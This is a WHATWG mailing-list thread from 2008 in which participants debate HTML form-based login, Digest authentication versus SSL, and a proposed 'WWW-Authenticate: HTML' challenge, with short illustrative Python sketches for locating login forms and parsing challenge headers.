Ian Hickson wrote: I wouldn't recommend running an HTTP parser in the kernel either. Anywhere where you can safely run an HTTP parser you can run an HTML parser too. Maybe, maybe not. I'll leave the answer to those who need to do it. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... Well if you don't have the credentials, you can't really login anyway. People are trained to configure credentials as value pairs (name, password). Anything more complex than that will be tricky to deploy in generic frameworks. In theory, you should be able to reformat everything that. If the request is to be able to take an HTML form and display it to the user as some other UI, then just apply the HTML semantics to the form to get the UI out. That's exactly what HTML is _for_: encoding media- and presentation-independent semantics. OK, so how do you tell a mount command that your credentials are more complex than username/password? For that matter, how do UAs like FF's password manager handle cases like these? ... BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Julian Reschke wrote: To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML-based UI... Well if you don't have the credentials, you can't really log in anyway. People are trained to configure credentials as value pairs (name, password). Anything more complex than that will be tricky to deploy in generic frameworks. Nothing requires servers to do anything but username/password. I don't really understand what you are asking here. Presumably in a system where only username/password credentials are desired, only username/password credentials will be used. If the request is to be able to take an HTML form and display it to the user as some other UI, then just apply the HTML semantics to the form to get the UI out. That's exactly what HTML is _for_: encoding media- and presentation-independent semantics. OK, so how do you tell a mount command that your credentials are more complex than username/password? How do you tell a mount command that your credentials are a certificate? This isn't an HTML issue. For that matter, how do UAs like FF's password manager handle cases like these? Password managers vary in implementation, but some remember all fields, others just the password field and one other heuristically-chosen field, others bail on such forms. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Julian Reschke wrote: I was hoping that the authentication scheme you're defining can be used without parsing the HTML response. A simple way to achieve it would be to restrict it to username/password pairs, and to have the names of these form parameters live in the response headers as well. We would have to, at a minimum, include the name of the username field, the name of the password field, and the URL of the form to POST to. I am very wary of duplicating information that is already available as it tends to become out of date and thus ends up being even more of a pain than if the information isn't there in the first place. OK, so how do you tell a mount command that your credentials are more complex than username/password? How do you tell a mount command that your credentials are a certificate? If your credentials are a cert, why would you use form-based logon? (I admit I'm not an expert on these issues, so please be patient with me). My point was not that a form might use cert authentication, but that whatever mechanism is available today for logging in with authentication schemes other than username/password would be the same ones one would continue to use to log in to systems with authentication schemes other than username/password. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008 05:26:47 -, Ian Hickson wrote: http://www.w3.org/TR/1999/NOTE-authentform-19990203 [...] I don't really understand what problem the above solves that isn't solved better by SSL. I agree that if real security is desired, SSL is the only way to go. However, given that most login forms on the web send passwords in the clear, other problems have evidently been more important than security. Form + Digest avoids these SSL problems: * Does not negatively impact performance. In the TLS handshake lots of messages go back and forth, so this can't be fixed by beefing up servers' CPUs. * Does not need access to the server's configuration, or generation, installation and renewal of certificates. Redistributable software can support it out of the box, on almost any server, without manual installation steps. Additionally, it's better than the new WWW-Authenticate: HTML authentication mechanism: * It's compatible with existing non-HTML HTTP clients. * Although its security is weak compared to SSL, it's a step up from forms + cookies. * It's easier to sell: "It will allow bots to log in" doesn't sound very desirable. "It will protect your users' passwords against passive eavesdropping" sounds better. I don't think WWW-Authenticate: HTML is a significant improvement. It doesn't offer anything to existing websites/browsers. It's primarily targeted at non-browser UAs, but it's not compatible with them. If UAs are required to parse HTML, they could just as well look for a form with a single password field. -- regards, Kornel Lesinski
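[Editorial sketch] The closing suggestion, that a UA able to parse HTML could simply look for a form with a single password field, can be sketched in Python as follows. The names `PasswordFormFinder` and `find_login_forms` are hypothetical, and the heuristic is only the one stated in the message: exactly one `<input type="password">` per form. Forms with two password fields, such as typical registration or change-password forms, are treated as not being login forms.

```python
from html.parser import HTMLParser


class PasswordFormFinder(HTMLParser):
    """Record every <form> together with its number of password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []       # one dict per <form>, in document order
        self._current = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "name": attrs.get("name"),
                "action": attrs.get("action"),
                "password_fields": 0,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password_fields"] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_login_forms(html):
    """Return the forms that contain exactly one password field."""
    finder = PasswordFormFinder()
    finder.feed(html)
    return [f for f in finder.forms if f["password_fields"] == 1]
```

A page can of course contain several such forms, or none, which is the ambiguity an explicit hint from the server would remove.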
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Kornel Lesinski wrote: On Tue, 25 Nov 2008 05:26:47 -, Ian Hickson wrote: http://www.w3.org/TR/1999/NOTE-authentform-19990203 [...] I don't really understand what problem the above solves that isn't solved better by SSL. I agree that if real security is desired, SSL is the only way to go. However, given that most login forms on the web send passwords in the clear, other problems have evidently been more important than security. Form + Digest avoids these SSL problems: * Does not negatively impact performance. In the TLS handshake lots of messages go back and forth, so this can't be fixed by beefing up servers' CPUs. This is also the case with form authentication. * Does not need access to the server's configuration, or generation, installation and renewal of certificates. Redistributable software can support it out of the box, on almost any server, without manual installation steps. Form authentication is even easier to support than Digest auth. Additionally, it's better than the new WWW-Authenticate: HTML authentication mechanism: * It's compatible with existing non-HTML HTTP clients. Agreed. * Although its security is weak compared to SSL, it's a step up from forms + cookies. Not really. If you can sniff the password from forms + cookies, then you can almost always also MitM a Digest connection, after which point you have basically lost. * It's easier to sell: "It will allow bots to log in" doesn't sound very desirable. "It will protect your users' passwords against passive eavesdropping" sounds better. Unfortunately, both of those advantages pale in comparison to "you can style your login form", which is the real advantage of WWW-Authenticate: HTML and (in particular) HTML form authentication. I don't think WWW-Authenticate: HTML is a significant improvement. It doesn't offer anything to existing websites/browsers. It's primarily targeted at non-browser UAs, but it's not compatible with them.
If UAs are required to parse HTML, they could just as well look for a form with a single password field. I agree that it's not that great. But it is slightly better than nothing, and the cost to support this is pretty minimal. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: It seems to me that the first limitation of form authentication could be removed by inventing a new WWW-Authenticate challenge that means "reply to the form in the page". I have now specified such a value in HTML5 (since it is specific to entity bodies that contain HTML forms):

  challenge = "HTML" [ form ]
  form = "form" "=" form-name
  form-name = quoted-string

(There's no credentials value for this scheme, since the login is done as a POST to a login script and then the server sets proprietary login information, like a cookie using Set-Cookie.) So when you get to a page that expects you to be logged in, it returns a 401 with:

  WWW-Authenticate: HTML form="login"

...and there must be a form element with name="login", which represents the form that must be submitted to log in.

This idea has promise, but is it compatible with existing browsers? The case where the only challenge included is HTML is probably okay, since browsers will at this point likely determine that they don't support any of the given schemes and just display the entity body. The only concern in this case is browser-provided default error pages for the 401 response, which can hopefully be suppressed in much the same way as sites suppress IE's default 404 error page, by padding the response to take it above a certain file size. More bothersome is this case:

  HTTP/1.1 401 Unauthorized
  ...
  WWW-Authenticate: HTML form="login"
  WWW-Authenticate: Basic realm=...

Will existing browsers see Basic there and use that in preference to displaying the error page? I suspect the answer is "it depends". I recall that some browsers only use Basic if it appears first, or perhaps only ever use the first in the list, which would be great for the use case of supporting, at the same endpoint, HTML auth for browsers and some other mechanism for non-browser agents that can't render HTML. (For example, a Microformats parser may be able to parse HTML and extract data but not have a way to present usable forms to the user.)
There's also one more case to consider. Many sites react to an unauthenticated request by *redirecting* to the login page. Maybe:

  HTTP/1.1 302 Found
  Location: /login.php
  WWW-Authenticate: HTML form="login"

where in this case the form is assumed to be in the body of the resource at /login.php, not in the response body. UI-wise, I'm imagining that browsers would auto-focus, highlight, or otherwise make the nominated form easily available once rendered. Is that what you were imagining?
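[Editorial sketch] To make the multiple-challenge case concrete, here is a rough Python illustration of how a client might read the proposed challenge and choose between HTML and Basic when both are offered. Everything here is an assumption for illustration: the function names are hypothetical, one challenge per WWW-Authenticate header line is assumed (as in the examples in this message), the parameter value is accepted with or without quotes, and the "use the first scheme in my own preference list" policy is just one possible behaviour, not something any browser is known to implement.

```python
import re

# name=value pairs, where value is either a quoted-string or a bare token.
_PARAM = re.compile(r'([\w-]+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,]+))')


def parse_challenge(value):
    """Split one WWW-Authenticate header value into (scheme, params)."""
    scheme, _, rest = value.strip().partition(" ")
    params = {}
    for match in _PARAM.finditer(rest):
        name = match.group(1).lower()
        if match.group(2) is not None:
            # Quoted-string: undo backslash escapes.
            params[name] = re.sub(r"\\(.)", r"\1", match.group(2))
        else:
            params[name] = match.group(3)
    return scheme, params


def pick_challenge(header_values, supported=("HTML", "Basic")):
    """Return the first challenge matching the client's preference order.

    `supported` lists the schemes this client understands, most preferred
    first; the result is None when none of the offered schemes is known.
    """
    challenges = [parse_challenge(v) for v in header_values]
    for wanted in supported:
        for scheme, params in challenges:
            if scheme.lower() == wanted.lower():
                return scheme, params
    return None
```

A client that can render forms would call `pick_challenge` with the default preference and then look up the form named by the `form` parameter; a non-browser agent would pass `supported=("Basic",)` and ignore the HTML challenge entirely.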